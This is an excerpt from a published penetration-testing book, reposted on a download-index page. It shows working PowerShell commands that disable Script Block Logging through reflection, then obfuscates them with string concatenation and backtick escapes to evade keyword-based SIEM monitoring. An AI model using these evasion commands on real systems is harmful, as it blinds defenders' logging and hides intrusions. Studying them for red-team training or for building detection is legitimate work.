How to Hack Like a Legend by Sparc Flow

Author:Sparc Flow [Sparc Flow]
Language: eng
Format: epub
Publisher: No Starch Press
Published: 2022-10-18T00:00:00+00:00

We need to disguise these terms while making sure they’re still usable. NonPublic and ScriptBlockLogging are simple strings, so we can use classic concatenation techniques to prevent detection. Let’s revisit the previous commands that disable Script Block Logging. 'NonPublic,Static' becomes 'No'+'nPublic,Static' and 'EnableScriptBlockLogging' becomes 'EnableScriptBloc'+'kLogging':

PS C:\Lab> $dict = $utils.GetField('cachedGroupPolicySettings', 'No'+'nPublic,Static') PS C:\Lab> $key = "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBl"+"ockLogging" PS C:\Lab> $dict.getValue("")[$key]['EnableScriptBloc'+'kLogging']=0

We’ve managed to hide two strings out of three, but what about the GetField method? You’d be surprised by the flexibility offered by PowerShell’s syntax. We can enclose a method call in double or single quotes, and it will still work perfectly fine:

..."GetField"('cachedGroupPolicySettings', 'No'+'nPublic,Static')

Oh, but look at that! Now GetField is a string, so we can apply classic concatenation techniques again, with extra parentheses added to make sure the concatenation occurs first:

...("Ge"+"tField")('cachedGroupPolicySettings', 'No'+'nPublic,Static')

Now for the grand finale, the cherry on top of this obfuscation awesomeness—we can add ` tick marks inside strings and they will be ignored, meaning the command will still execute normally. The only constraint is that you shouldn’t use the tick mark before the characters 0, a, b, f, n, r, t, or v, lest they be interpreted as the special characters null, alert, backspace, form feed, newline, carriage return, horizontal tab, and vertical tab, respectively. Here we add a tick mark before the letter “i” in GetField:

...("Ge"+"tF`ield")('cachedGroupPolicySettings', 'No'+'nPublic,Static')

The special characters just mentioned are case-sensitive, so nothing forbids us from placing a tick mark in front of an uppercase F, for instance:

...("Ge"+"t`F`ield")('cachedGroupPolicySettings', 'No'+'nPublic,Static')

The final Script Block Logging code now looks like the following:

PS C:\Lab> $utils = [ref].Assembly.GetType('System.Management.Automation.Utils') PS C:\Lab> $dict = $utils.("Ge"+"t`F`ield")('cachedGroupPolicySettings', 'NonP'+'ublic,Static') PS C:\Lab> $key = "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBl"+"ockLogging" PS C:\Lab> $dict.getValue("")[$key]['EnableS'+'criptBlockLogging'] = 0

When we run these commands in our test lab, each one gets logged as expected, but they are all categorized as Verbose rather than a full-on Warning (Figure 8-4) and thus drown in the midst of the thousand meaningless other Verbose messages. What’s more, the obfuscation techniques we’ve applied will likely bypass any keyword monitoring performed by QRadar.

Figure 8-4: The obfuscation techniques bypass keyword monitoring, and our attack blends into the sea of Verbose logs.

Download

Copyright Disclaimer:
This site does not store any files on its server. We only index and link to content provided by other sites. Please contact the content providers to delete copyright contents if any and email us, we'll remove relevant links or contents immediately.